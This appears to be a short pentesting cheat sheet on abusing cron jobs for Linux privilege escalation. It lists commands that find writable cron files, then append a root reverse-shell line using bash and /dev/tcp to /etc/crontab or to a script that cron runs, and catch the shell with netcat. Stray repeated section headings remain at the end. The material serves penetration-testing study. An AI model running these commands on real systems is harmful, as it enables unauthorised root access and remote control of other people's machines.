Cron Job Abuse

Cron jobs run scheduled tasks, often as root. Misconfigured or writable cron jobs can be abused to gain elevated privileges.

Enumeration

find /etc/cron* /var/spool/cron -type f -writable 2>/dev/null  

# Check user-specific cron jobs  
crontab -l  

Exploitation

# 1. Edit the cron job file to execute a reverse shell  
echo '* * * * * root bash -i >& /dev/tcp/IP/PORT 0>&1' >> /etc/crontab  

# 2. Restart the cron service (if possible)  
systemctl restart cron  

# 3. Wait for execution and catch the shell  
nc -lvnp <port>  

# If a script is executed by a cron job, inject a malicious command and wait for it to run
echo 'bash -i >& /dev/tcp/<your-ip>/<port> 0>&1' >> /path/to/script  

Enumeration​

Exploitation​

Enumeration

Exploitation